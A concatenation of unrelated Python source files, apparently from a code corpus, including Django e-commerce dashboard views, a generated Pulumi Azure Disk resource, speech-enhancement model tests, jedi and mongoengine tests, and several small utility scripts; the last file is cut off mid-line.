variant_form = None variant_errors = False if product_form.is_valid() and not variant_errors: product = product_form.save() if create_variant: variant.product = product variant_form.save() msg = pgettext_lazy( 'Dashboard message', 'Added product %s') % product messages.success(request, msg) return redirect('dashboard:product-update', pk=product.pk) ctx = {'product_form': product_form, 'variant_form': variant_form, 'product': product} return TemplateResponse( request, 'dashboard/product/product_form.html', ctx) @staff_member_required def product_edit(request, pk): product = get_object_or_404( Product.objects.prefetch_related( 'images', 'variants'), pk=pk) edit_variant = not product.product_class.has_variants attributes = product.product_class.variant_attributes.prefetch_related( 'values') images = product.images.all() variants = product.variants.all() stock_items = Stock.objects.filter( variant__in=variants).select_related('variant', 'location') form = forms.ProductForm(request.POST or None, instance=product) variants_delete_form = forms.VariantBulkDeleteForm() stock_delete_form = forms.StockBulkDeleteForm() if edit_variant: variant = variants.first() variant_form = forms.ProductVariantForm( request.POST or None, instance=variant, prefix='variant') variant_errors = not variant_form.is_valid() else: variant_form = None variant_errors = False if form.is_valid() and not variant_errors: product = form.save() msg = pgettext_lazy( 'Dashboard message', 'Updated product %s') % product messages.success(request, msg) return redirect('dashboard:product-update', pk=product.pk) ctx = {'attributes': attributes, 'images': images, 'product_form': form, 'product': product, 'stock_delete_form': stock_delete_form, 'stock_items': stock_items, 'variants': variants, 'variants_delete_form': variants_delete_form, 'variant_form': variant_form} return TemplateResponse( request, 'dashboard/product/product_form.html', ctx) @staff_member_required def product_delete(request, pk): product = get_object_or_404(Product, pk=pk) if request.method == 'POST': product.delete() messages.success( request, pgettext_lazy('Dashboard message', 'Deleted product %s') % product) return redirect('dashboard:product-list') return TemplateResponse( request, 'dashboard/product/modal_product_confirm_delete.html', {'product': product}) @staff_member_required def stock_edit(request, product_pk, stock_pk=None): product = get_object_or_404(Product, pk=product_pk) if stock_pk: stock = get_object_or_404(Stock, pk=stock_pk) else: stock = Stock() form = forms.StockForm(request.POST or None, instance=stock, product=product) if form.is_valid(): form.save() messages.success( request, pgettext_lazy('Dashboard message', 'Saved stock')) product_url = reverse( 'dashboard:product-update', kwargs={'pk': product_pk}) success_url = request.POST.get('success_url', product_url) if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'form': form, 'product': product, 'stock': stock} return TemplateResponse(request, 'dashboard/product/stock_form.html', ctx) @staff_member_required def stock_delete(request, product_pk, stock_pk): product = get_object_or_404(Product, pk=product_pk) stock = get_object_or_404(Stock, pk=stock_pk) if request.method == 'POST': stock.delete() messages.success( request, pgettext_lazy('Dashboard message', 'Deleted stock')) success_url = request.POST['success_url'] if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'product': product, 'stock': stock} return TemplateResponse( request, 'dashboard/product/stock_confirm_delete.html', ctx) @staff_member_required @require_http_methods(['POST']) def stock_bulk_delete(request, product_pk): product = get_object_or_404(Product, pk=product_pk) form = forms.StockBulkDeleteForm(request.POST) if form.is_valid(): form.delete() success_url = request.POST['success_url'] messages.success( request, pgettext_lazy('Dashboard message', 'Deleted stock')) if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) return redirect('dashboard:product-update', pk=product.pk) @staff_member_required def product_image_edit(request, product_pk, img_pk=None): product = get_object_or_404(Product, pk=product_pk) if img_pk: product_image = get_object_or_404(product.images, pk=img_pk) else: product_image = ProductImage(product=product) show_variants = product.product_class.has_variants form = forms.ProductImageForm(request.POST or None, request.FILES or None, instance=product_image) if form.is_valid(): product_image = form.save() if img_pk: msg = pgettext_lazy( 'Dashboard message', 'Updated image %s') % product_image.image.name else: msg = pgettext_lazy( 'Dashboard message', 'Added image %s') % product_image.image.name messages.success(request, msg) success_url = request.POST['success_url'] if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'form': form, 'product': product, 'product_image': product_image, 'show_variants': show_variants} return TemplateResponse( request, 'dashboard/product/product_image_form.html', ctx) @staff_member_required def product_image_delete(request, product_pk, img_pk): product = get_object_or_404(Product, pk=product_pk) product_image = get_object_or_404(product.images, pk=img_pk) if request.method == 'POST': product_image.delete() messages.success( request, pgettext_lazy( 'Dashboard message', 'Deleted image %s') % product_image.image.name) success_url = request.POST['success_url'] if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'product': product, 'product_image': product_image} return TemplateResponse( request, 'dashboard/product/modal_product_image_confirm_delete.html', ctx) @staff_member_required def variant_edit(request, product_pk, variant_pk=None): product = get_object_or_404(Product.objects.all(), pk=product_pk) form_initial = {} if variant_pk: variant = get_object_or_404(product.variants.all(), pk=variant_pk) else: variant = ProductVariant(product=product) form = forms.ProductVariantForm(request.POST or None, instance=variant, initial=form_initial) attribute_form = forms.VariantAttributeForm(request.POST or None, instance=variant) if all([form.is_valid(), attribute_form.is_valid()]): form.save() attribute_form.save() if variant_pk: msg = pgettext_lazy( 'Dashboard message', 'Updated variant %s') % variant.name else: msg = pgettext_lazy( 'Dashboard message', 'Added variant %s') % variant.name messages.success(request, msg) success_url = request.POST['success_url'] if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'attribute_form': attribute_form, 'form': form, 'product': product, 'variant': variant} return TemplateResponse( request, 'dashboard/product/variant_form.html', ctx) @staff_member_required def variant_delete(request, product_pk, variant_pk): product = get_object_or_404(Product, pk=product_pk) variant = get_object_or_404(product.variants, pk=variant_pk) is_only_variant = product.variants.count() == 1 if request.method == 'POST': variant.delete() messages.success( request, pgettext_lazy( 'Dashboard message', 'Deleted variant %s') % variant.name) success_url = request.POST['success_url'] if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) ctx = {'is_only_variant': is_only_variant, 'product': product, 'variant': variant} return TemplateResponse( request, 'dashboard/product/modal_product_variant_confirm_delete.html', ctx) @staff_member_required @require_http_methods(['POST']) def variants_bulk_delete(request, product_pk): product = get_object_or_404(Product, pk=product_pk) form = forms.VariantBulkDeleteForm(request.POST) if form.is_valid(): form.delete() success_url = request.POST['success_url'] messages.success( request, pgettext_lazy('Dashboard message', 'Deleted variants')) if is_safe_url(success_url, allowed_hosts=request.get_host()): return redirect(success_url) return redirect('dashboard:product-update', pk=product.pk) @staff_member_required def attribute_list(request): attributes = [ (attribute.pk, attribute.name, attribute.values.all()) for attribute in ProductAttribute.objects.prefetch_related('values')] ctx = {'attributes': attributes} return TemplateResponse(request, 'dashboard/product/attributes/list.html', ctx) @staff_member_required def attribute_edit(request, pk=None): if pk: attribute = get_object_or_404(ProductAttribute, pk=pk) else: attribute = ProductAttribute() form = forms.ProductAttributeForm(request.POST or None, instance=attribute) formset = forms.AttributeChoiceValueFormset(request.POST or None, request.FILES or None, instance=attribute) if all([form.is_valid(), formset.is_valid()]): attribute = form.save() formset.save() msg = pgettext_lazy( 'Dashboard message', 'Updated attribute') if pk else pgettext_lazy( 'Dashboard message', 'Added attribute') messages.success(request, msg) return redirect('dashboard:product-attribute-update', pk=attribute.pk) ctx = {'attribute': attribute, 'form': form, 'formset': formset} return TemplateResponse(request, 'dashboard/product/attributes/form.html', ctx) @staff_member_required def attribute_delete(request, pk): attribute = get_object_or_404(ProductAttribute, pk=pk) if request.method == 'POST': attribute.delete() messages.success( request, pgettext_lazy( 'Dashboard message', 'Deleted attribute %s') % (attribute.name,)) return redirect('dashboard:product-attributes') ctx = {'attribute': attribute} return TemplateResponse( request, 'dashboard/product/attributes/modal_confirm_delete.html', ctx) @staff_member_required def stock_location_list(request): stock_locations = StockLocation.objects.all() ctx = {'locations': stock_locations} return TemplateResponse( request, 'dashboard/product/stock_locations/list.html', ctx) @staff_member_required def stock_location_edit(request, location_pk=None): if location_pk: location = get_object_or_404(StockLocation, pk=location_pk) else: location = StockLocation() form = forms.StockLocationForm(request.POST or None, instance=location) if form.is_valid(): form.save() msg = pgettext_lazy( 'Dashboard message for stock location', 'Updated location') if location_pk else pgettext_lazy( 'Dashboard message for stock location', 'Added location') messages.success(request, msg) return redirect('dashboard:product-stock-location-list') ctx = {'form': form, 'location': location} return TemplateResponse( request, 'dashboard/product/stock_locations/form.html', ctx) @staff_member_required def stock_location_delete(request, location_pk): location = get_object_or_404(StockLocation, pk=location_pk) stock_count = location.stock_set.count() if request.method == 'POST': location.delete() messages.success( request, pgettext_lazy( 'Dashboard message for stock location', 'Deleted location %s') % location) return redirect('dashboard:product-stock-location-list') ctx = {'location': location, 'stock_count': stock_count} return TemplateResponse( request, 'dashboard/product/stock_locations/modal_confirm_delete.html', ctx)
py
7dfcfb4d8e253672d9648a2069771d316266098b
""" Remove Nth Node From End of List Given a linked list, remove the n-th node from the end of list and return its head. Example: Given linked list: 1->2->3->4->5, and n = 2. After removing the second node from the end, the linked list becomes 1->2->3->5. Note: Given n will always be valid. Follow up: Could you do this in one pass? """ # Definition for singly-linked list. class ListNode(object): def __init__(self, x): self.val = x self.next = None class Solution(object): def removeNthFromEnd(self, head, n): """ :type head: ListNode :type n: int :rtype: ListNode """ # init, use dummmy to handle the case: remove first node dummy = ListNode(-1) dummy.next = head slow, fast = dummy, dummy while n > 0 and fast.next: n -= 1 fast = fast.next if n > 0: return dummy.next # slow, fast->end while fast and fast.next: slow, fast = slow.next, fast.next # delete node slow.next = slow.next.next return dummy.next
py
7dfcfb9d64726a679fe412447d282817d458d403
import matplotlib import numpy as np import matplotlib.pyplot as plt def polyfit(dates , levels, p): time_shift=1 date_num=matplotlib.dates.date2num(dates) y=levels d0=2 shifted_dates = date_num-date_num[0] p_coeff=np.polyfit(shifted_dates,y,p) poly=np.poly1d(p_coeff) return(poly, time_shift)
py
7dfcfbdabfab6f773ff53ae776dc309d4ff42925
import unittest import functools import argparse import os,sys,inspect import copy from HDPython.base import * from HDPython.v_symbol import * from HDPython.v_entity import * from HDPython.v_list import * class clk_generator(v_entity): def __init__(self): super().__init__() self.clk = port_out(v_sl()) self.architecture() @architecture def architecture(self): @timed() def proc(): self.clk << 1 #print("======================") yield wait_for(10) self.clk << 0 yield wait_for(10)
py
7dfcfd0d627e556ac12a03745df817e925291e4e
""" Test compiled module """ import os import jedi from ..helpers import cwd_at import pytest def test_completions(Script): s = Script('import _ctypes; _ctypes.') assert len(s.completions()) >= 15 def test_call_signatures_extension(Script): if os.name == 'nt': func = 'LoadLibrary' params = 1 else: func = 'dlopen' params = 2 s = Script('import _ctypes; _ctypes.%s(' % (func,)) sigs = s.call_signatures() assert len(sigs) == 1 assert len(sigs[0].params) == params def test_call_signatures_stdlib(Script): s = Script('import math; math.cos(') sigs = s.call_signatures() assert len(sigs) == 1 assert len(sigs[0].params) == 1 # Check only on linux 64 bit platform and Python3.4. @pytest.mark.skipif('sys.platform != "linux" or sys.maxsize <= 2**32 or sys.version_info[:2] != (3, 4)') @cwd_at('test/test_evaluate') def test_init_extension_module(Script): """ ``__init__`` extension modules are also packages and Jedi should understand that. Originally coming from #472. This test was built by the module.c and setup.py combination you can find in the init_extension_module folder. You can easily build the `__init__.cpython-34m.so` by compiling it (create a virtualenv and run `setup.py install`. This is also why this test only runs on certain systems (and Python 3.4). """ s = jedi.Script('import init_extension_module as i\ni.', path='not_existing.py') assert 'foo' in [c.name for c in s.completions()] s = jedi.Script('from init_extension_module import foo\nfoo', path='not_existing.py') assert ['foo'] == [c.name for c in s.completions()]
py
7dfcfd9d0ceea8562bb42d422e6ac153f4b846c5
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables from . import outputs from ._enums import * from ._inputs import * __all__ = ['Disk'] class Disk(pulumi.CustomResource): def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, account_type: Optional[pulumi.Input['StorageAccountTypes']] = None, creation_data: Optional[pulumi.Input[pulumi.InputType['CreationDataArgs']]] = None, disk_name: Optional[pulumi.Input[str]] = None, disk_size_gb: Optional[pulumi.Input[int]] = None, encryption_settings: Optional[pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']]] = None, location: Optional[pulumi.Input[str]] = None, os_type: Optional[pulumi.Input['OperatingSystemTypes']] = None, resource_group_name: Optional[pulumi.Input[str]] = None, tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None, __props__=None, __name__=None, __opts__=None): """ Disk resource. :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input['StorageAccountTypes'] account_type: the storage account type of the disk. :param pulumi.Input[pulumi.InputType['CreationDataArgs']] creation_data: Disk source information. CreationData information cannot be changed after the disk has been created. :param pulumi.Input[str] disk_name: The name of the managed disk that is being created. The name can't be changed after the disk is created. Supported characters for the name are a-z, A-Z, 0-9 and _. The maximum name length is 80 characters. :param pulumi.Input[int] disk_size_gb: If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size. :param pulumi.Input[pulumi.InputType['EncryptionSettingsArgs']] encryption_settings: Encryption settings for disk or snapshot :param pulumi.Input[str] location: Resource location :param pulumi.Input['OperatingSystemTypes'] os_type: The Operating System type. :param pulumi.Input[str] resource_group_name: The name of the resource group. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags """ if __name__ is not None: warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning) resource_name = __name__ if __opts__ is not None: warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning) opts = __opts__ if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = dict() __props__['account_type'] = account_type if creation_data is None and not opts.urn: raise TypeError("Missing required property 'creation_data'") __props__['creation_data'] = creation_data __props__['disk_name'] = disk_name __props__['disk_size_gb'] = disk_size_gb __props__['encryption_settings'] = encryption_settings __props__['location'] = location __props__['os_type'] = os_type if resource_group_name is None and not opts.urn: raise TypeError("Missing required property 'resource_group_name'") __props__['resource_group_name'] = resource_group_name __props__['tags'] = tags __props__['name'] = None __props__['owner_id'] = None __props__['provisioning_state'] = None __props__['time_created'] = None __props__['type'] = None alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:compute/v20160430preview:Disk"), pulumi.Alias(type_="azure-native:compute:Disk"), pulumi.Alias(type_="azure-nextgen:compute:Disk"), pulumi.Alias(type_="azure-native:compute/latest:Disk"), pulumi.Alias(type_="azure-nextgen:compute/latest:Disk"), pulumi.Alias(type_="azure-native:compute/v20170330:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20170330:Disk"), pulumi.Alias(type_="azure-native:compute/v20180401:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180401:Disk"), pulumi.Alias(type_="azure-native:compute/v20180601:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180601:Disk"), pulumi.Alias(type_="azure-native:compute/v20180930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20180930:Disk"), pulumi.Alias(type_="azure-native:compute/v20190301:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190301:Disk"), pulumi.Alias(type_="azure-native:compute/v20190701:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20190701:Disk"), pulumi.Alias(type_="azure-native:compute/v20191101:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20191101:Disk"), pulumi.Alias(type_="azure-native:compute/v20200501:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200501:Disk"), pulumi.Alias(type_="azure-native:compute/v20200630:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200630:Disk"), pulumi.Alias(type_="azure-native:compute/v20200930:Disk"), pulumi.Alias(type_="azure-nextgen:compute/v20200930:Disk")]) opts = pulumi.ResourceOptions.merge(opts, alias_opts) super(Disk, __self__).__init__( 'azure-native:compute/v20160430preview:Disk', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None) -> 'Disk': """ Get an existing Disk resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = dict() __props__["account_type"] = None __props__["creation_data"] = None __props__["disk_size_gb"] = None __props__["encryption_settings"] = None __props__["location"] = None __props__["name"] = None __props__["os_type"] = None __props__["owner_id"] = None __props__["provisioning_state"] = None __props__["tags"] = None __props__["time_created"] = None __props__["type"] = None return Disk(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter(name="accountType") def account_type(self) -> pulumi.Output[Optional[str]]: """ the storage account type of the disk. """ return pulumi.get(self, "account_type") @property @pulumi.getter(name="creationData") def creation_data(self) -> pulumi.Output['outputs.CreationDataResponse']: """ Disk source information. CreationData information cannot be changed after the disk has been created. """ return pulumi.get(self, "creation_data") @property @pulumi.getter(name="diskSizeGB") def disk_size_gb(self) -> pulumi.Output[Optional[int]]: """ If creationData.createOption is Empty, this field is mandatory and it indicates the size of the VHD to create. If this field is present for updates or creation with other options, it indicates a resize. Resizes are only allowed if the disk is not attached to a running VM, and can only increase the disk's size. """ return pulumi.get(self, "disk_size_gb") @property @pulumi.getter(name="encryptionSettings") def encryption_settings(self) -> pulumi.Output[Optional['outputs.EncryptionSettingsResponse']]: """ Encryption settings for disk or snapshot """ return pulumi.get(self, "encryption_settings") @property @pulumi.getter def location(self) -> pulumi.Output[str]: """ Resource location """ return pulumi.get(self, "location") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ Resource name """ return pulumi.get(self, "name") @property @pulumi.getter(name="osType") def os_type(self) -> pulumi.Output[Optional[str]]: """ The Operating System type. """ return pulumi.get(self, "os_type") @property @pulumi.getter(name="ownerId") def owner_id(self) -> pulumi.Output[str]: """ A relative URI containing the VM id that has the disk attached. """ return pulumi.get(self, "owner_id") @property @pulumi.getter(name="provisioningState") def provisioning_state(self) -> pulumi.Output[str]: """ The disk provisioning state. """ return pulumi.get(self, "provisioning_state") @property @pulumi.getter def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]: """ Resource tags """ return pulumi.get(self, "tags") @property @pulumi.getter(name="timeCreated") def time_created(self) -> pulumi.Output[str]: """ The time when the disk was created. """ return pulumi.get(self, "time_created") @property @pulumi.getter def type(self) -> pulumi.Output[str]: """ Resource type """ return pulumi.get(self, "type") def translate_output_property(self, prop): return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop def translate_input_property(self, prop): return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
py
7dfcfdaa15a0cfc55ba332be6607f08a05e1702e
import argparse import simpleamt if __name__ == "__main__": parser = argparse.ArgumentParser( parents=[simpleamt.get_parent_parser()], description="Delete HITs" ) parser.add_argument("--worker_ids_file") args = parser.parse_args() mtc = simpleamt.get_mturk_connection_from_args(args) worker_ids = [] with open(args.worker_ids_file, "r") as f: worker_ids = [line.strip() for line in f] print( "This will block %d workers with IDs with sandbox=%s" % (len(worker_ids), str(args.sandbox)) ) print("Continue?") s = input("(y/N): ") if s.strip().lower() == "y": for worker_id in worker_ids: try: mtc.create_worker_block( WorkerI=worker_id, Reason="provided bad data" ) except Exception as e: print("Failed to block: %s" % (worker_id)) print(e) else: print("Aborting")
py
7dfcfde723fbb6d636d1916564e9e2bf4a1a56dc
#!/usr/bin/env python # Copyright 2020 Jian Wu # License: Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0) import pytest import torch as th from aps.libs import aps_sse_nnet from aps.transform import EnhTransform num_bins = 257 log_cmvn_transform = EnhTransform(feats="spectrogram-log-cmvn", frame_len=512, frame_hop=256, center=True) with_ipd_transform = EnhTransform(feats="spectrogram-log-cmvn-ipd", frame_len=512, frame_hop=256, center=True, ipd_index="0,1;0,2;0,3") none_transform = EnhTransform(feats="", frame_len=512, frame_hop=256, center=True) @pytest.mark.parametrize("num_spks,non_linear", [ pytest.param(1, "sigmoid"), pytest.param(2, "softmax"), pytest.param(3, "relu") ]) def test_base_rnn(num_spks, non_linear): nnet_cls = aps_sse_nnet("sse@base_rnn") base_rnn = nnet_cls(enh_transform=log_cmvn_transform, num_bins=num_bins, input_size=num_bins, input_proj=512, num_layers=2, hidden=512, num_spks=num_spks, mask_non_linear=non_linear) inp = th.rand(2, 64000) x = base_rnn(inp) if num_spks > 1: x = x[0] assert x.shape == th.Size([2, num_bins, 251]) z = base_rnn.infer(inp[0]) if num_spks > 1: z = z[0] assert z.shape == th.Size([64000]) @pytest.mark.parametrize("non_linear", ["softmax", "relu"]) def test_chimera(non_linear): nnet_cls = aps_sse_nnet("sse@chimera++") chimera = nnet_cls(enh_transform=log_cmvn_transform, num_bins=num_bins, input_size=num_bins, num_layers=2, hidden=512, num_spks=2, mask_non_linear=non_linear) inp = th.rand(2, 64000) x = chimera(inp) assert x[0].shape == th.Size([2, num_bins, 251]) z = chimera.infer(inp[0]) assert z[0].shape == th.Size([64000]) def test_phasen(): nnet_cls = aps_sse_nnet("sse@phasen") phasen = nnet_cls(12, 4, enh_transform=none_transform, num_tsbs=1, num_bins=num_bins, channel_r=5, conv1d_kernel=9, lstm_hidden=256, linear_size=512) inp = th.rand(4, 64000) x = phasen(inp) assert x.shape == th.Size([4, num_bins, 251, 2]) z = phasen.infer(inp[1]) assert z.shape == th.Size([64000]) @pytest.mark.parametrize("num_branch", [1, 2]) @pytest.mark.parametrize("cplx", [True, False]) def test_dcunet(num_branch, cplx): nnet_cls = aps_sse_nnet("sse@dcunet") dcunet = nnet_cls(enh_transform=none_transform, K="7,5;7,5;5,3;5,3;3,3;3,3", S="2,1;2,1;2,1;2,1;2,1;2,1", C="32,32,64,64,64,128", P="1,1,1,1,1,0", O="0,0,1,1,1,0", num_branch=num_branch, cplx=cplx, non_linear="tanh" if cplx else "sigmoid", causal_conv=False, connection="cat") inp = th.rand(4, 64000) x = dcunet(inp) if num_branch > 1: x = x[0] assert x.shape == th.Size([4, 64000]) y = dcunet.infer(inp[1]) if num_branch > 1: y = y[0] assert y.shape == th.Size([64000]) @pytest.mark.parametrize("num_spks", [1, 2]) @pytest.mark.parametrize("non_linear", ["", "sigmoid"]) def test_dense_unet(num_spks, non_linear): nnet_cls = aps_sse_nnet("sse@dense_unet") dense_unet = nnet_cls(K="3,3;3,3;3,3;3,3;3,3;3,3;3,3;3,3", S="1,1;2,1;2,1;2,1;2,1;2,1;2,1;2,1", P="0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1;0,1", O="0,0,0,0,0,0,0,0", enc_channel="16,32,32,32,32,64,128,384", dec_channel="32,16,32,32,32,32,64,128", conv_dropout=0.3, num_spks=num_spks, rnn_hidden=512, rnn_layers=2, rnn_resize=384, rnn_bidir=False, rnn_dropout=0.2, num_dense_blocks=3, enh_transform=log_cmvn_transform, non_linear=non_linear, inp_cplx=True, out_cplx=True, training_mode="time") inp = th.rand(4, 64000) x = dense_unet(inp) if num_spks > 1: x = x[0] assert x.shape == th.Size([4, 64000]) y = dense_unet.infer(inp[1]) if num_spks > 1: y = y[0] assert y.shape == th.Size([64000]) @pytest.mark.parametrize("num_spks", [1, 2]) def test_freq_xfmr(num_spks): nnet_cls = aps_sse_nnet("sse@freq_xfmr") pose_kwargs = {"lradius": 256, "rradius": 256, "dropout": 0.1} arch_kwargs = { "att_dropout": 0.1, "feedforward_dim": 512, "pre_norm": False, "att_dim": 256, "nhead": 4 } xfmr = nnet_cls(arch="xfmr", input_size=num_bins, enh_transform=log_cmvn_transform, num_spks=num_spks, num_bins=num_bins, arch_kwargs=arch_kwargs, pose_kwargs=pose_kwargs, num_layers=3, non_linear="sigmoid", training_mode="time") inp = th.rand(4, 64000) x = xfmr(inp) if num_spks > 1: assert len(x) == num_spks assert x[0].shape == th.Size([4, 64000]) else: assert x.shape == th.Size([4, 64000]) y = xfmr.infer(inp[1]) if num_spks > 1: y = y[0] assert y.shape == th.Size([64000]) @pytest.mark.parametrize("num_spks,nonlinear", [ pytest.param(1, "sigmoid"), pytest.param(2, "softmax"), pytest.param(2, "relu") ]) def test_tasnet(num_spks, nonlinear): nnet_cls = aps_sse_nnet("sse@time_tcn") tasnet = nnet_cls(L=40, N=256, X=6, R=2, B=256, H=512, P=3, norm="cLN", num_spks=num_spks, non_linear=nonlinear, skip_residual=True, causal=False, mixture_consistency="none") inp = th.rand(4, 64000) x = tasnet(inp) if num_spks > 1: x = x[0] assert x.shape == th.Size([4, 64000]) y = tasnet.infer(inp[1]) if num_spks > 1: y = y[0] assert y.shape == th.Size([64000]) @pytest.mark.parametrize("num_spks", [1, 2]) @pytest.mark.parametrize("cplx", [True, False]) def test_dccrn(num_spks, cplx): nnet_cls = aps_sse_nnet("sse@dccrn") dccrn = nnet_cls(enh_transform=log_cmvn_transform, cplx=cplx, K="3,3;3,3;3,3;3,3;3,3;3,3;3,3", S="2,1;2,1;2,1;2,1;2,1;2,1;2,1", P="1,1,1,1,1,0,0", O="0,0,0,0,0,0,1", C="16,32,64,64,128,128,256", num_spks=num_spks, rnn_resize=512 if cplx else 256, non_linear="sigmoid", connection="cat") inp = th.rand(4, 64000) x = dccrn(inp) if num_spks > 1: x = x[0] assert x.shape == th.Size([4, 64000]) y = dccrn.infer(inp[1]) if num_spks > 1: y = y[0] assert y.shape == th.Size([64000]) def test_rnn_enh_ml(): nnet_cls = aps_sse_nnet("sse@rnn_enh_ml") rnn_enh_ml = nnet_cls(enh_transform=with_ipd_transform, num_bins=num_bins, input_size=num_bins * 4, input_proj=512, num_layers=2, hidden=512) inp = th.rand(2, 5, 64000) x, y = rnn_enh_ml(inp) assert x.shape == th.Size([2, 5, num_bins, 251]) assert th.isnan(x.real).sum() + th.isnan(x.imag).sum() == 0 assert y.shape == th.Size([2, 251, num_bins]) z = rnn_enh_ml.infer(inp[0]) assert z.shape == th.Size([251, num_bins]) @pytest.mark.parametrize("resampling_factor", [1, 2, 4]) @pytest.mark.parametrize("chunk_len", [16000, 32000]) def test_demucs(resampling_factor, chunk_len): nnet_cls = aps_sse_nnet("sse@demucs") from aps.sse.enh.demucs import workout_train_chunk_length chunk_len_for_train = workout_train_chunk_length( chunk_len, resampling_factor=resampling_factor) demucs = nnet_cls(resampling_factor=resampling_factor) x = th.rand(2, chunk_len_for_train) y = demucs(x) assert y.shape == th.Size([2, chunk_len_for_train]) x = th.rand(chunk_len) y = demucs.infer(x) assert y.shape == th.Size([chunk_len]) @pytest.mark.parametrize("num_spks", [1, 2]) def test_dfsmn(num_spks): nnet_cls = aps_sse_nnet("sse@dfsmn") dfsmn = nnet_cls(enh_transform=log_cmvn_transform, num_layers=3, dim=512, num_branchs=num_spks, project=256, lctx=11, rctx=5, training_mode="time") inp = th.rand(4, 64000) x = dfsmn(inp) if num_spks > 1: x = x[0] assert x.shape == th.Size([4, 64000]) y = dfsmn.infer(inp[1]) if num_spks > 1: y = y[0] assert y.shape == th.Size([64000]) def test_dprnn(): nnet_cls = aps_sse_nnet("sse@time_dprnn") dprnn = nnet_cls(num_spks=1, kernel=16, num_bins=64, chunk_size=100, num_layers=2, rnn_hidden=64, bidirectional=True, non_linear="relu") inp = th.rand(4, 64000) x = dprnn(inp) assert x.shape == th.Size([4, 64000]) y = dprnn.infer(inp[1]) assert y.shape == th.Size([64000]) def test_sepformer(): nnet_cls = aps_sse_nnet("sse@freq_sepformer") arch_kwargs = { "att_dim": 256, "nhead": 4, "feedforward_dim": 1024, "pre_norm": True, "att_dropout": 0.1, "ffn_dropout": 0.1, "activation": "relu" } sepformer = nnet_cls("xfmr", enh_transform=log_cmvn_transform, num_bins=num_bins, num_spks=1, num_blocks=2, num_layers=2, chunk_size=16, arch_kwargs=arch_kwargs, training_mode="time") mix = th.rand(2, 32000) bss = sepformer(mix) assert bss.shape == th.Size([2, 32000]) bss = sepformer.infer(mix[1]) assert bss.shape == th.Size([32000])
py
7dfcffc357177139a3cbddcf4799e66c23ce698e
# 043 - Write a Python program to get OS name, platform and release information. from platform import release, system from os import name print(f'Name: {name}\nPlatform: {release()}\nRelease: {system()}')
py
7dfcffefa580f7c02e9ce710f581b4a713b08092
from enum import Enum import pytest from bson import InvalidDocument from mongoengine import Document, EnumField, ValidationError from tests.utils import MongoDBTestCase, get_as_pymongo class Status(Enum): NEW = "new" DONE = "done" class ModelWithEnum(Document): status = EnumField(Status) class TestStringEnumField(MongoDBTestCase): def test_storage(self): model = ModelWithEnum(status=Status.NEW).save() assert get_as_pymongo(model) == {"_id": model.id, "status": "new"} def test_set_enum(self): ModelWithEnum.drop_collection() ModelWithEnum(status=Status.NEW).save() assert ModelWithEnum.objects(status=Status.NEW).count() == 1 assert ModelWithEnum.objects.first().status == Status.NEW def test_set_by_value(self): ModelWithEnum.drop_collection() ModelWithEnum(status="new").save() assert ModelWithEnum.objects.first().status == Status.NEW def test_filter(self): ModelWithEnum.drop_collection() ModelWithEnum(status="new").save() assert ModelWithEnum.objects(status="new").count() == 1 assert ModelWithEnum.objects(status=Status.NEW).count() == 1 assert ModelWithEnum.objects(status=Status.DONE).count() == 0 def test_change_value(self): m = ModelWithEnum(status="new") m.status = Status.DONE m.save() assert m.status == Status.DONE m.status = "wrong" assert m.status == "wrong" with pytest.raises(ValidationError): m.validate() def test_set_default(self): class ModelWithDefault(Document): status = EnumField(Status, default=Status.DONE) m = ModelWithDefault().save() assert m.status == Status.DONE def test_enum_field_can_be_empty(self): ModelWithEnum.drop_collection() m = 